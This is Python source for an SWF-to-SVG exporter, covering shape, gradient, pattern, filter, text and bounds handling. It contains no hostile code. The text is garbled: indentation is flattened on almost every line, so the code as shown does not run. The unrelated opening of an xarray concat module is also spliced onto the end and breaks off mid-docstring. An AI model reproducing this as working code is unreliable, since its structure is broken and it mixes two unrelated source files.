def line_style(self,
thickness=float('nan'), color=0, alpha=1.0,
pixelHinting=False,
scaleMode=LineScaleMode.NORMAL,
startCaps=None, endCaps=None,
joints=None, miterLimit=3.0):
pass
def line_gradient_style(self,
thickness=float('nan'), color=0, alpha=1.0,
pixelHinting=False,
scaleMode=LineScaleMode.NORMAL,
startCaps=None, endCaps=None,
joints=None, miterLimit=3.0,
type = 1, colors = [], alphas = [], ratios = [],
matrix=None,
spreadMethod=SpreadMethod.PAD,
interpolationMethod=InterpolationMethod.RGB,
focalPointRatio=0.0):
pass
def line_bitmap_style(self,
thickness=float('nan'),
pixelHinting=False,
scaleMode=LineScaleMode.NORMAL,
startCaps=None, endCaps=None,
joints=None, miterLimit = 3.0,
bitmap_id=None, matrix=None, repeat=False, smooth=False):
pass
def end_fill(self):
pass
def begin_fills(self):
pass
def end_fills(self):
pass
def begin_lines(self):
pass
def end_lines(self):
pass
def begin_shape(self):
pass
def end_shape(self):
pass
def move_to(self, x, y):
#print "move_to", x, y
pass
def line_to(self, x, y):
#print "line_to", x, y
pass
def curve_to(self, cx, cy, ax, ay):
#print "curve_to", cx, cy, ax, ay
pass
class DefaultSVGShapeExporter(DefaultShapeExporter):
def __init__(self, defs=None):
self.defs = defs
self.current_draw_command = ""
self.path_data = ""
self._e = objectify.ElementMaker(annotate=False,
namespace=SVG_NS, nsmap={None : SVG_NS, "xlink" : XLINK_NS})
super(DefaultSVGShapeExporter, self).__init__()
def move_to(self, x, y):
self.current_draw_command = ""
self.path_data += "M" + \
str(NumberUtils.round_pixels_20(x)) + " " + \
str(NumberUtils.round_pixels_20(y)) + " "
def line_to(self, x, y):
if self.current_draw_command != "L":
self.current_draw_command = "L"
self.path_data += "L"
self.path_data += "" + \
str(NumberUtils.round_pixels_20(x)) + " " + \
str(NumberUtils.round_pixels_20(y)) + " "
def curve_to(self, cx, cy, ax, ay):
if self.current_draw_command != "Q":
self.current_draw_command = "Q"
self.path_data += "Q"
self.path_data += "" + \
str(NumberUtils.round_pixels_20(cx)) + " " + \
str(NumberUtils.round_pixels_20(cy)) + " " + \
str(NumberUtils.round_pixels_20(ax)) + " " + \
str(NumberUtils.round_pixels_20(ay)) + " "
def begin_bitmap_fill(self, bitmap_id, matrix=None, repeat=False, smooth=False):
self.finalize_path()
def begin_fill(self, color, alpha=1.0):
self.finalize_path()
def end_fill(self):
pass
#self.finalize_path()
def begin_fills(self):
pass
def end_fills(self):
self.finalize_path()
def begin_gradient_fill(self, type, colors, alphas, ratios,
matrix=None,
spreadMethod=SpreadMethod.PAD,
interpolationMethod=InterpolationMethod.RGB,
focalPointRatio=0.0):
self.finalize_path()
def line_style(self,
thickness=float('nan'), color=0, alpha=1.0,
pixelHinting=False,
scaleMode=LineScaleMode.NORMAL,
startCaps=None, endCaps=None,
joints=None, miterLimit=3.0):
self.finalize_path()
def end_lines(self):
self.finalize_path()
def end_shape(self):
self.finalize_path()
def finalize_path(self):
self.current_draw_command = ""
self.path_data = ""
class SVGShapeExporter(DefaultSVGShapeExporter):
def __init__(self):
self.path = None
self.num_patterns = 0
self.num_gradients = 0
self._gradients = {}
self._gradient_ids = {}
self.paths = {}
self.fills_ended = False
super(SVGShapeExporter, self).__init__()
def begin_shape(self):
self.g = self._e.g()
def begin_fill(self, color, alpha=1.0):
self.finalize_path()
self.path.set("fill", ColorUtils.to_rgb_string(color))
if alpha < 1.0:
self.path.set("fill-opacity", str(alpha))
elif self.force_stroke:
self.path.set("stroke", ColorUtils.to_rgb_string(color))
self.path.set("stroke-width", "1")
else:
self.path.set("stroke", "none")
def begin_gradient_fill(self, type, colors, alphas, ratios,
matrix=None,
spreadMethod=SpreadMethod.PAD,
interpolationMethod=InterpolationMethod.RGB,
focalPointRatio=0.0):
self.finalize_path()
gradient_id = self.export_gradient(type, colors, alphas, ratios, matrix, spreadMethod, interpolationMethod, focalPointRatio)
self.path.set("stroke", "none")
self.path.set("fill", "url(#%s)" % gradient_id)
def export_gradient(self, type, colors, alphas, ratios,
matrix=None,
spreadMethod=SpreadMethod.PAD,
interpolationMethod=InterpolationMethod.RGB,
focalPointRatio=0.0):
self.num_gradients += 1
gradient_id = "gradient%d" % self.num_gradients
gradient = self._e.linearGradient() if type == GradientType.LINEAR \
else self._e.radialGradient()
gradient.set("gradientUnits", "userSpaceOnUse")
if type == GradientType.LINEAR:
gradient.set("x1", "-819.2")
gradient.set("x2", "819.2")
else:
gradient.set("r", "819.2")
gradient.set("cx", "0")
gradient.set("cy", "0")
        if focalPointRatio != 0.0:
gradient.set("fx", str(819.2 * focalPointRatio))
gradient.set("fy", "0")
if spreadMethod == SpreadMethod.PAD:
gradient.set("spreadMethod", "pad")
elif spreadMethod == SpreadMethod.REFLECT:
gradient.set("spreadMethod", "reflect")
elif spreadMethod == SpreadMethod.REPEAT:
gradient.set("spreadMethod", "repeat")
if interpolationMethod == InterpolationMethod.LINEAR_RGB:
gradient.set("color-interpolation", "linearRGB")
if matrix is not None:
sm = _swf_matrix_to_svg_matrix(matrix)
gradient.set("gradientTransform", sm);
for i in range(0, len(colors)):
entry = self._e.stop()
offset = ratios[i] / 255.0
entry.set("offset", str(offset))
if colors[i] != 0.0:
entry.set("stop-color", ColorUtils.to_rgb_string(colors[i]))
if alphas[i] != 1.0:
entry.set("stop-opacity", str(alphas[i]))
gradient.append(entry)
# prevent same gradient in <defs />
key = etree.tostring(gradient)
if key in self._gradients:
gradient_id = self._gradient_ids[key]
else:
self._gradients[key] = copy.copy(gradient)
self._gradient_ids[key] = gradient_id
gradient.set("id", gradient_id)
self.defs.append(gradient)
return gradient_id
def export_pattern(self, bitmap_id, matrix, repeat=False, smooth=False):
self.num_patterns += 1
bitmap_id = "c%d" % bitmap_id
e = self.defs.xpath("./svg:image[@id='%s']" % bitmap_id, namespaces=NS)
if len(e) < 1:
raise Exception("SVGShapeExporter::begin_bitmap_fill Could not find bitmap!")
image = e[0]
pattern_id = "pat%d" % (self.num_patterns)
pattern = self._e.pattern()
pattern.set("id", pattern_id)
pattern.set("width", image.get("width"))
pattern.set("height", image.get("height"))
pattern.set("patternUnits", "userSpaceOnUse")
#pattern.set("patternContentUnits", "objectBoundingBox")
        if matrix is not None:
            pattern.set("patternTransform", _swf_matrix_to_svg_matrix(matrix, True, True, True))
use = self._e.use()
use.set(XLINK_HREF, "#%s" % bitmap_id)
pattern.append(use)
self.defs.append(pattern)
return pattern_id
def begin_bitmap_fill(self, bitmap_id, matrix=None, repeat=False, smooth=False):
self.finalize_path()
pattern_id = self.export_pattern(bitmap_id, matrix, repeat, smooth)
self.path.set("stroke", "none")
self.path.set("fill", "url(#%s)" % pattern_id)
def line_style(self,
thickness=float('nan'), color=0, alpha=1.0,
pixelHinting=False,
scaleMode=LineScaleMode.NORMAL,
startCaps=None, endCaps=None,
joints=None, miterLimit=3.0):
self.finalize_path()
self.path.set("fill", "none")
self.path.set("stroke", ColorUtils.to_rgb_string(color))
thickness = 1 if math.isnan(thickness) else thickness
thickness = MINIMUM_STROKE_WIDTH if thickness < MINIMUM_STROKE_WIDTH else thickness
self.path.set("stroke-width", str(thickness))
if alpha < 1.0:
self.path.set("stroke-opacity", str(alpha))
def line_gradient_style(self,
thickness=float('nan'),
pixelHinting = False,
scaleMode=LineScaleMode.NORMAL,
startCaps=0, endCaps=0,
joints=0, miterLimit=3.0,
type = 1,
colors = [],
alphas = [],
ratios = [],
matrix=None,
spreadMethod=SpreadMethod.PAD,
interpolationMethod=InterpolationMethod.RGB,
focalPointRatio=0.0):
self.finalize_path()
gradient_id = self.export_gradient(type, colors, alphas, ratios, matrix, spreadMethod, interpolationMethod, focalPointRatio)
self.path.set("fill", "none")
self.path.set("stroke-linejoin", JOIN_STYLE[joints])
self.path.set("stroke-linecap", CAPS_STYLE[startCaps])
self.path.set("stroke", "url(#%s)" % gradient_id)
thickness = 1 if math.isnan(thickness) else thickness
thickness = MINIMUM_STROKE_WIDTH if thickness < MINIMUM_STROKE_WIDTH else thickness
self.path.set("stroke-width", str(thickness))
def line_bitmap_style(self,
thickness=float('nan'),
pixelHinting=False,
scaleMode=LineScaleMode.NORMAL,
startCaps=None, endCaps=None,
joints=None, miterLimit = 3.0,
bitmap_id=None, matrix=None, repeat=False, smooth=False):
self.finalize_path()
pattern_id = self.export_pattern(bitmap_id, matrix, repeat, smooth)
self.path.set("fill", "none")
self.path.set("stroke", "url(#%s)" % pattern_id)
self.path.set("stroke-linejoin", JOIN_STYLE[joints])
self.path.set("stroke-linecap", CAPS_STYLE[startCaps])
thickness = 1 if math.isnan(thickness) else thickness
thickness = MINIMUM_STROKE_WIDTH if thickness < MINIMUM_STROKE_WIDTH else thickness
self.path.set("stroke-width", str(thickness))
def begin_fills(self):
self.fills_ended = False
def end_fills(self):
self.finalize_path()
self.fills_ended = True
def finalize_path(self):
if self.path is not None and len(self.path_data) > 0:
self.path_data = self.path_data.rstrip()
self.path.set("d", self.path_data)
self.g.append(self.path)
self.path = self._e.path()
super(SVGShapeExporter, self).finalize_path()
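# For orientation (coordinates are illustrative): a move_to(10, 20) followed by
# line_to(30, 20) accumulates path data along the lines of "M10 20 L30 20 ";
# finalize_path() strips the trailing space, stores it on the <path> "d"
# attribute and appends the path to the current <g> element.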
class BaseExporter(object):
def __init__(self, swf=None, shape_exporter=None, force_stroke=False):
self.shape_exporter = SVGShapeExporter() if shape_exporter is None else shape_exporter
self.clip_depth = 0
self.mask_id = None
self.jpegTables = None
self.force_stroke = force_stroke
if swf is not None:
self.export(swf)
def export(self, swf, force_stroke=False):
self.force_stroke = force_stroke
self.export_define_shapes(swf.tags)
self.export_display_list(self.get_display_tags(swf.tags))
def export_define_bits(self, tag):
png_buffer = BytesIO()
image = None
if isinstance(tag, TagDefineBitsJPEG3):
tag.bitmapData.seek(0)
tag.bitmapAlphaData.seek(0, 2)
num_alpha = tag.bitmapAlphaData.tell()
tag.bitmapAlphaData.seek(0)
image = Image.open(tag.bitmapData)
if num_alpha > 0:
image_width = image.size[0]
image_height = image.size[1]
image_data = image.getdata()
image_data_len = len(image_data)
if num_alpha == image_data_len:
buff = ""
for i in range(0, num_alpha):
alpha = ord(tag.bitmapAlphaData.read(1))
rgb = list(image_data[i])
buff += struct.pack("BBBB", rgb[0], rgb[1], rgb[2], alpha)
image = Image.frombytes("RGBA", (image_width, image_height), buff)
elif isinstance(tag, TagDefineBitsJPEG2):
tag.bitmapData.seek(0)
image = Image.open(tag.bitmapData)
else:
tag.bitmapData.seek(0)
if self.jpegTables is not None:
buff = BytesIO()
self.jpegTables.seek(0)
buff.write(self.jpegTables.read())
buff.write(tag.bitmapData.read())
buff.seek(0)
image = Image.open(buff)
else:
image = Image.open(tag.bitmapData)
self.export_image(tag, image)
def export_define_bits_lossless(self, tag):
tag.bitmapData.seek(0)
image = Image.open(tag.bitmapData)
self.export_image(tag, image)
def export_define_sprite(self, tag, parent=None):
display_tags = self.get_display_tags(tag.tags)
self.export_display_list(display_tags, parent)
def export_define_shape(self, tag):
self.shape_exporter.debug = isinstance(tag, TagDefineShape4)
tag.shapes.export(self.shape_exporter)
def export_define_shapes(self, tags):
for tag in tags:
if isinstance(tag, SWFTimelineContainer):
self.export_define_sprite(tag)
self.export_define_shapes(tag.tags)
elif isinstance(tag, TagDefineShape):
self.export_define_shape(tag)
elif isinstance(tag, TagJPEGTables):
if tag.length > 0:
self.jpegTables = tag.jpegTables
elif isinstance(tag, TagDefineBits):
self.export_define_bits(tag)
elif isinstance(tag, TagDefineBitsLossless):
self.export_define_bits_lossless(tag)
elif isinstance(tag, TagDefineFont):
self.export_define_font(tag)
elif isinstance(tag, TagDefineText):
self.export_define_text(tag)
def export_display_list(self, tags, parent=None):
self.clip_depth = 0
for tag in tags:
self.export_display_list_item(tag, parent)
def export_display_list_item(self, tag, parent=None):
pass
def export_image(self, tag, image=None):
pass
def get_display_tags(self, tags, z_sorted=True):
dp_tuples = []
for tag in tags:
if isinstance(tag, TagPlaceObject):
dp_tuples.append((tag, tag.depth))
elif isinstance(tag, TagShowFrame):
break
if z_sorted:
dp_tuples = sorted(dp_tuples, key=lambda tag_info: tag_info[1])
display_tags = []
for item in dp_tuples:
display_tags.append(item[0])
return display_tags
def serialize(self):
return None
class SVGExporter(BaseExporter):
def __init__(self, swf=None, margin=0):
self._e = objectify.ElementMaker(annotate=False,
namespace=SVG_NS, nsmap={None : SVG_NS, "xlink" : XLINK_NS})
self._margin = margin
super(SVGExporter, self).__init__(swf)
def export(self, swf, force_stroke=False):
""" Exports the specified SWF to SVG.
@param swf The SWF.
@param force_stroke Whether to force strokes on non-stroked fills.
"""
self.svg = self._e.svg(version=SVG_VERSION)
self.force_stroke = force_stroke
self.defs = self._e.defs()
self.root = self._e.g()
self.svg.append(self.defs)
self.svg.append(self.root)
self.shape_exporter.defs = self.defs
self._num_filters = 0
self.fonts = dict([(x.characterId,x) for x in swf.all_tags_of_type(TagDefineFont)])
self.fontInfos = dict([(x.characterId,x) for x in swf.all_tags_of_type(TagDefineFontInfo)])
# GO!
super(SVGExporter, self).export(swf, force_stroke)
# Setup svg @width, @height and @viewBox
# and add the optional margin
self.bounds = SVGBounds(self.svg)
self.svg.set("width", "%dpx" % round(self.bounds.width))
self.svg.set("height", "%dpx" % round(self.bounds.height))
if self._margin > 0:
self.bounds.grow(self._margin)
vb = [self.bounds.minx, self.bounds.miny,
self.bounds.width, self.bounds.height]
self.svg.set("viewBox", "%s" % " ".join(map(str,vb)))
        # Return the SVG as BytesIO
        return self._serialize()
    def _serialize(self):
        return BytesIO(etree.tostring(self.svg,
                                      encoding="UTF-8", xml_declaration=True))
def export_define_sprite(self, tag, parent=None):
id = "c%d"%tag.characterId
g = self._e.g(id=id)
self.defs.append(g)
self.clip_depth = 0
super(SVGExporter, self).export_define_sprite(tag, g)
def export_define_font(self, tag):
fontInfo = self.fontInfos[tag.characterId]
if not fontInfo.useGlyphText:
return
defs = self._e.defs(id="font_{0}".format(tag.characterId))
for index, glyph in enumerate(tag.glyphShapeTable):
# Export the glyph as a shape and add the path to the "defs"
# element to be referenced later when exporting text.
code_point = fontInfo.codeTable[index]
pathGroup = glyph.export().g.getchildren()
if len(pathGroup):
path = pathGroup[0]
path.set("id", "font_{0}_{1}".format(tag.characterId, code_point))
# SWF glyphs are always defined on an EM square of 1024 by 1024 units.
path.set("transform", "scale({0})".format(float(1)/EM_SQUARE_LENGTH))
# We'll be setting the color on the USE element that
# references this element.
del path.attrib["stroke"]
del path.attrib["fill"]
defs.append(path)
self.defs.append(defs)
def export_define_text(self, tag):
g = self._e.g(id="c{0}".format(int(tag.characterId)))
g.set("class", "text_content")
x = 0
y = 0
for rec in tag.records:
if rec.hasXOffset:
x = rec.xOffset/PIXELS_PER_TWIP
if rec.hasYOffset:
y = rec.yOffset/PIXELS_PER_TWIP
size = rec.textHeight/PIXELS_PER_TWIP
fontInfo = self.fontInfos[rec.fontId]
if not fontInfo.useGlyphText:
inner_text = ""
xValues = []
for glyph in rec.glyphEntries:
code_point = fontInfo.codeTable[glyph.index]
# Ignore control characters
if code_point in range(32):
continue
if fontInfo.useGlyphText:
use = self._e.use()
use.set(XLINK_HREF, "#font_{0}_{1}".format(rec.fontId, code_point))
use.set(
'transform',
"scale({0}) translate({1} {2})".format(
size, float(x)/size, float(y)/size
)
)
color = ColorUtils.to_rgb_string(ColorUtils.rgb(rec.textColor))
use.set("style", "fill: {0}; stroke: {0}".format(color))
g.append(use)
else:
inner_text += unichr(code_point)
xValues.append(str(x))
x = x + float(glyph.advance)/PIXELS_PER_TWIP
if not fontInfo.useGlyphText:
text = self._e.text(inner_text)
text.set("font-family", fontInfo.fontName)
text.set("font-size", str(size))
text.set("fill", ColorUtils.to_rgb_string(ColorUtils.rgb(rec.textColor)))
text.set("y", str(y))
text.set("x", " ".join(xValues))
if fontInfo.bold:
text.set("font-weight", "bold")
if fontInfo.italic:
text.set("font-style", "italic")
g.append(text)
self.defs.append(g)
def export_define_shape(self, tag):
self.shape_exporter.force_stroke = self.force_stroke
super(SVGExporter, self).export_define_shape(tag)
shape = self.shape_exporter.g
shape.set("id", "c%d" % tag.characterId)
self.defs.append(shape)
def export_display_list_item(self, tag, parent=None):
g = self._e.g()
use = self._e.use()
is_mask = False
if tag.hasMatrix:
use.set("transform", _swf_matrix_to_svg_matrix(tag.matrix))
        if tag.hasClipDepth:
            self.mask_id = "mask%d" % tag.characterId
            self.clip_depth = tag.clipDepth
            g = self._e.mask(id=self.mask_id)
            is_mask = True
# make sure the mask is completely filled white
paths = self.defs.xpath("./svg:g[@id='c%d']/svg:path" % tag.characterId, namespaces=NS)
for path in paths:
path.set("fill", "#ffffff")
elif tag.depth <= self.clip_depth and self.mask_id is not None:
g.set("mask", "url(#%s)" % self.mask_id)
filters = []
filter_cxform = None
self._num_filters += 1
filter_id = "filter%d" % self._num_filters
svg_filter = self._e.filter(id=filter_id)
if tag.hasColorTransform:
filter_cxform = self.export_color_transform(tag.colorTransform, svg_filter)
filters.append(filter_cxform)
if tag.hasFilterList and len(tag.filters) > 0:
cxform = "color-xform" if tag.hasColorTransform else None
f = self.export_filters(tag, svg_filter, cxform)
if len(f) > 0:
filters.extend(f)
if tag.hasColorTransform or (tag.hasFilterList and len(filters) > 0):
self.defs.append(svg_filter)
use.set("filter", "url(#%s)" % filter_id)
use.set(XLINK_HREF, "#c%s" % tag.characterId)
g.append(use)
if is_mask:
self.defs.append(g)
else:
if parent is not None:
parent.append(g)
else:
self.root.append(g)
return use
def export_color_transform(self, cxform, svg_filter, result='color-xform'):
fe_cxform = self._e.feColorMatrix()
fe_cxform.set("in", "SourceGraphic")
fe_cxform.set("type", "matrix")
fe_cxform.set("values", " ".join(map(str, cxform.matrix)))
fe_cxform.set("result", "cxform")
fe_composite = self._e.feComposite(operator="in")
fe_composite.set("in2", "SourceGraphic")
fe_composite.set("result", result)
svg_filter.append(fe_cxform)
svg_filter.append(fe_composite)
return result
def export_filters(self, tag, svg_filter, cxform=None):
num_filters = len(tag.filters)
elements = []
attr_in = None
for i in range(0, num_filters):
swf_filter = tag.filters[i]
#print swf_filter
if isinstance(swf_filter, FilterDropShadow):
elements.append(self.export_filter_dropshadow(swf_filter, svg_filter, cxform))
#print swf_filter.strength
elif isinstance(swf_filter, FilterBlur):
pass
elif isinstance(swf_filter, FilterGlow):
#attr_in = SVGFilterFactory.export_glow_filter(self._e, svg_filter, attr_in=attr_in)
#elements.append(attr_in)
pass
elif isinstance(swf_filter, FilterBevel):
pass
elif isinstance(swf_filter, FilterGradientGlow):
pass
elif isinstance(swf_filter, FilterConvolution):
pass
elif isinstance(swf_filter, FilterColorMatrix):
attr_in = SVGFilterFactory.export_color_matrix_filter(self._e, svg_filter, swf_filter.colorMatrix, svg_filter, attr_in=attr_in)
elements.append(attr_in)
elif isinstance(swf_filter, FilterGradientBevel):
pass
else:
raise Exception("unknown filter: ", swf_filter)
return elements
# <filter id="test-filter" x="-50%" y="-50%" width="200%" height="200%">
# <feGaussianBlur in="SourceAlpha" stdDeviation="6" result="blur"/>
# <feOffset dy="0" dx="0"/>
# <feComposite in2="SourceAlpha" operator="arithmetic"
# k2="-1" k3="1" result="shadowDiff"/>
# <feFlood flood-color="black" flood-opacity="1"/>
# <feComposite in2="shadowDiff" operator="in"/>
# </filter>;
def export_filter_dropshadow(self, swf_filter, svg_filter, blend_in=None, result="offsetBlur"):
gauss = self._e.feGaussianBlur()
gauss.set("in", "SourceAlpha")
gauss.set("stdDeviation", "6")
gauss.set("result", "blur")
if swf_filter.knockout:
composite0 = self._e.feComposite(
in2="SourceAlpha", operator="arithmetic",
k2="-1", k3="1", result="shadowDiff")
flood = self._e.feFlood()
flood.set("flood-color", "black")
flood.set("flood-opacity", "1")
composite1 = self._e.feComposite(
in2="shadowDiff", operator="in", result=result)
svg_filter.append(gauss)
svg_filter.append(composite0)
svg_filter.append(flood)
svg_filter.append(composite1)
else:
SVGFilterFactory.create_drop_shadow_filter(self._e, svg_filter,
None,
swf_filter.blurX/20.0,
swf_filter.blurY/20.0,
blend_in,
result)
#print etree.tostring(svg_filter, pretty_print=True)
return result
def export_image(self, tag, image=None):
if image is not None:
buff = BytesIO()
image.save(buff, "PNG")
buff.seek(0)
data_url = _encode_png(buff.read())
img = self._e.image()
img.set("id", "c%s" % tag.characterId)
img.set("x", "0")
img.set("y", "0 ")
img.set("width", "%s" % str(image.size[0]))
img.set("height", "%s" % str(image.size[1]))
img.set(XLINK_HREF, "%s" % data_url)
self.defs.append(img)
class SingleShapeSVGExporter(SVGExporter):
"""
An SVG exporter which knows how to export a single shape.
NB: This class is here just for backward compatibility.
Use SingleShapeSVGExporterMixin instead to mix with other functionality.
"""
def __init__(self, margin=0):
super(SingleShapeSVGExporter, self).__init__(margin = margin)
def export_single_shape(self, shape_tag, swf):
class MySingleShapeSVGExporter(SingleShapeSVGExporterMixin, SVGExporter):
pass
exporter = MySingleShapeSVGExporter()
return exporter.export(swf, shape=shape_tag)
class SingleShapeSVGExporterMixin(object):
def export(self, swf, shape, **export_opts):
""" Exports the specified shape of the SWF to SVG.
@param swf The SWF.
@param shape Which shape to export, either by characterId(int) or as a Tag object.
"""
# If `shape` is given as int, find corresponding shape tag.
if isinstance(shape, Tag):
shape_tag = shape
else:
shapes = [x for x in swf.all_tags_of_type((TagDefineShape, TagDefineSprite)) if x.characterId == shape]
if len(shapes):
shape_tag = shapes[0]
else:
raise Exception("Shape %s not found" % shape)
from swf.movie import SWF
# find a typical use of this shape
example_place_objects = [x for x in swf.all_tags_of_type(TagPlaceObject) if x.hasCharacter and x.characterId == shape_tag.characterId]
if len(example_place_objects):
place_object = example_place_objects[0]
characters = swf.build_dictionary()
ids_to_export = place_object.get_dependencies()
ids_exported = set()
tags_to_export = []
# this had better form a dag!
while len(ids_to_export):
id = ids_to_export.pop()
if id in ids_exported or id not in characters:
continue
tag = characters[id]
ids_to_export.update(tag.get_dependencies())
tags_to_export.append(tag)
ids_exported.add(id)
tags_to_export.reverse()
tags_to_export.append(place_object)
else:
place_object = TagPlaceObject()
place_object.hasCharacter = True
place_object.characterId = shape_tag.characterId
tags_to_export = [ shape_tag, place_object ]
stunt_swf = SWF()
stunt_swf.tags = tags_to_export
return super(SingleShapeSVGExporterMixin, self).export(stunt_swf, **export_opts)
class FrameSVGExporterMixin(object):
def export(self, swf, frame, **export_opts):
""" Exports a frame of the specified SWF to SVG.
@param swf The SWF.
@param frame Which frame to export, by 0-based index (int)
"""
self.wanted_frame = frame
        return super(FrameSVGExporterMixin, self).export(swf, **export_opts)
def get_display_tags(self, tags, z_sorted=True):
current_frame = 0
frame_tags = dict() # keys are depths, values are placeobject tags
for tag in tags:
if isinstance(tag, TagShowFrame):
if current_frame == self.wanted_frame:
break
current_frame += 1
elif isinstance(tag, TagPlaceObject):
if tag.hasMove:
orig_tag = frame_tags.pop(tag.depth)
if not tag.hasCharacter:
tag.characterId = orig_tag.characterId
# this is for NamesSVGExporterMixin
if not tag.hasName:
tag.instanceName = orig_tag.instanceName
frame_tags[tag.depth] = tag
elif isinstance(tag, TagRemoveObject):
del frame_tags[tag.depth]
return super(FrameSVGExporterMixin, self).get_display_tags(frame_tags.values(), z_sorted)
class NamesSVGExporterMixin(object):
'''
Add class="n-<name>" to SVG elements for tags that have an instanceName.
'''
def export_display_list_item(self, tag, parent=None):
use = super(NamesSVGExporterMixin, self).export_display_list_item(tag, parent)
if hasattr(tag, 'instanceName') and tag.instanceName is not None:
use.set('class', 'n-%s' % tag.instanceName)
return use
class SVGFilterFactory(object):
# http://commons.oreilly.com/wiki/index.php/SVG_Essentials/Filters
# http://dev.opera.com/articles/view/svg-evolution-3-applying-polish/
@classmethod
def create_drop_shadow_filter(cls, e, filter, attr_in=None, blurX=0, blurY=0, blend_in=None, result=None):
gaussianBlur = SVGFilterFactory.create_gaussian_blur(e, attr_deviaton="1", result="blur-out")
offset = SVGFilterFactory.create_offset(e, "blur-out", blurX, blurY, "the-shadow")
blend = SVGFilterFactory.create_blend(e, blend_in, attr_in2="the-shadow", result=result)
filter.append(gaussianBlur)
filter.append(offset)
filter.append(blend)
return result
@classmethod
def export_color_matrix_filter(cls, e, filter, matrix, svg_filter, attr_in=None, result='color-matrix'):
attr_in = "SourceGraphic" if attr_in is None else attr_in
fe_cxform = e.feColorMatrix()
fe_cxform.set("in", attr_in)
fe_cxform.set("type", "matrix")
fe_cxform.set("values", " ".join(map(str, matrix)))
fe_cxform.set("result", result)
filter.append(fe_cxform)
#print etree.tostring(filter, pretty_print=True)
return result
@classmethod
def export_glow_filter(cls, e, filter, attr_in=None, result="glow-out"):
attr_in = "SourceGraphic" if attr_in is None else attr_in
        gaussianBlur = SVGFilterFactory.create_gaussian_blur(e, attr_in=attr_in, attr_deviation="1", result=result)
filter.append(gaussianBlur)
return result
@classmethod
def create_blend(cls, e, attr_in=None, attr_in2="BackgroundImage", mode="normal", result=None):
blend = e.feBlend()
attr_in = "SourceGraphic" if attr_in is None else attr_in
blend.set("in", attr_in)
blend.set("in2", attr_in2)
blend.set("mode", mode)
if result is not None:
blend.set("result", result)
return blend
@classmethod
    def create_gaussian_blur(cls, e, attr_in="SourceAlpha", attr_deviation="3", result=None):
        gaussianBlur = e.feGaussianBlur()
        gaussianBlur.set("in", attr_in)
        gaussianBlur.set("stdDeviation", attr_deviation)
if result is not None:
gaussianBlur.set("result", result)
return gaussianBlur
@classmethod
def create_offset(cls, e, attr_in=None, dx=0, dy=0, result=None):
offset = e.feOffset()
if attr_in is not None:
offset.set("in", attr_in)
offset.set("dx", "%d" % round(dx))
offset.set("dy", "%d" % round(dy))
if result is not None:
offset.set("result", result)
return offset
class SVGBounds(object):
def __init__(self, svg=None):
self.minx = 1000000.0
self.miny = 1000000.0
self.maxx = -self.minx
self.maxy = -self.miny
self._stack = []
self._matrix = self._calc_combined_matrix()
if svg is not None:
            self._svg = svg
self._parse(svg)
def add_point(self, x, y):
self.minx = x if x < self.minx else self.minx
self.miny = y if y < self.miny else self.miny
self.maxx = x if x > self.maxx else self.maxx
self.maxy = y if y > self.maxy else self.maxy
def set(self, minx, miny, maxx, maxy):
self.minx = minx
self.miny = miny
self.maxx = maxx
self.maxy = maxy
def grow(self, margin):
self.minx -= margin
self.miny -= margin
self.maxx += margin
self.maxy += margin
@property
def height(self):
return self.maxy - self.miny
def merge(self, other):
self.minx = other.minx if other.minx < self.minx else self.minx
self.miny = other.miny if other.miny < self.miny else self.miny
self.maxx = other.maxx if other.maxx > self.maxx else self.maxx
self.maxy = other.maxy if other.maxy > self.maxy else self.maxy
def shrink(self, margin):
self.minx += margin
self.miny += margin
self.maxx -= margin
self.maxy -= margin
@property
def width(self):
return self.maxx - self.minx
def _parse(self, element):
if element.get("transform") and element.get("transform").find("matrix") < 0:
pass
if element.get("transform") and element.get("transform").find("matrix") >= 0:
self._push_transform(element.get("transform"))
if element.tag == "{%s}path" % SVG_NS:
self._handle_path_data(str(element.get("d")))
elif element.tag == "{%s}use" % SVG_NS:
href = element.get(XLINK_HREF)
if href:
href = href.replace("#", "")
els = self._svg.xpath("./svg:defs//svg:g[@id='%s']" % href,
namespaces=NS)
if len(els) > 0:
self._parse(els[0])
for child in element.getchildren():
if child.tag == "{%s}defs" % SVG_NS: continue
self._parse(child)
if element.get("transform") and element.get("transform").find("matrix") >= 0:
self._pop_transform()
def _build_matrix(self, transform):
if transform.find("matrix") >= 0:
raw = str(transform).replace("matrix(", "").replace(")", "")
            f = list(map(float, re.split(r"\s+|,", raw)))
return Matrix2(f[0], f[1], f[2], f[3], f[4], f[5])
def _calc_combined_matrix(self):
m = Matrix2()
for mat in self._stack:
m.append_matrix(mat)
return m
def _handle_path_data(self, d):
        parts = re.split(r"\s+", d)
for i in range(0, len(parts), 2):
try:
p0 = parts[i]
p1 = parts[i+1]
p0 = p0.replace("M", "").replace("L", "").replace("Q", "")
p1 = p1.replace("M", "").replace("L", "").replace("Q", "")
v = [float(p0), float(p1)]
w = self._matrix.multiply_point(v)
self.minx = w[0] if w[0] < self.minx else self.minx
self.miny = w[1] if w[1] < self.miny else self.miny
self.maxx = w[0] if w[0] > self.maxx else self.maxx
self.maxy = w[1] if w[1] > self.maxy else self.maxy
            except (ValueError, IndexError):
continue
def _pop_transform(self):
m = self._stack.pop()
self._matrix = self._calc_combined_matrix()
return m
def _push_transform(self, transform):
self._stack.append(self._build_matrix(transform))
self._matrix = self._calc_combined_matrix()
def _encode_jpeg(data):
    return "data:image/jpeg;base64," + base64.b64encode(data).decode("ascii")
def _encode_png(data):
    return "data:image/png;base64," + base64.b64encode(data).decode("ascii")
def _swf_matrix_to_matrix(swf_matrix=None, need_scale=False, need_translate=True, need_rotation=False, unit_div=20.0):
if swf_matrix is None:
        values = [1, 0, 0, 1, 0, 0]
else:
values = swf_matrix.to_array()
if need_rotation:
values[1] /= unit_div
values[2] /= unit_div
if need_scale:
values[0] /= unit_div
values[3] /= unit_div
if need_translate:
values[4] /= unit_div
values[5] /= unit_div
return values
def _swf_matrix_to_svg_matrix(swf_matrix=None, need_scale=False, need_translate=True, need_rotation=False, unit_div=20.0):
values = _swf_matrix_to_matrix(swf_matrix, need_scale, need_translate, need_rotation, unit_div)
str_values = ",".join(map(str, values))
return "matrix(%s)" % str_values
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import warnings
import pandas as pd
from . import utils
from .alignment import align
from .merge import merge
from .pycompat import iteritems, OrderedDict, basestring
from .variable import Variable, as_variable, IndexVariable, concat as concat_vars
def concat(objs, dim=None, data_vars='all', coords='different',
compat='equals', positions=None, indexers=None, mode=None,
concat_over=None):
"""Concatenate xarray objects along a new or existing dimension.
Parameters
----------
objs : sequence of Dataset and DataArray objects
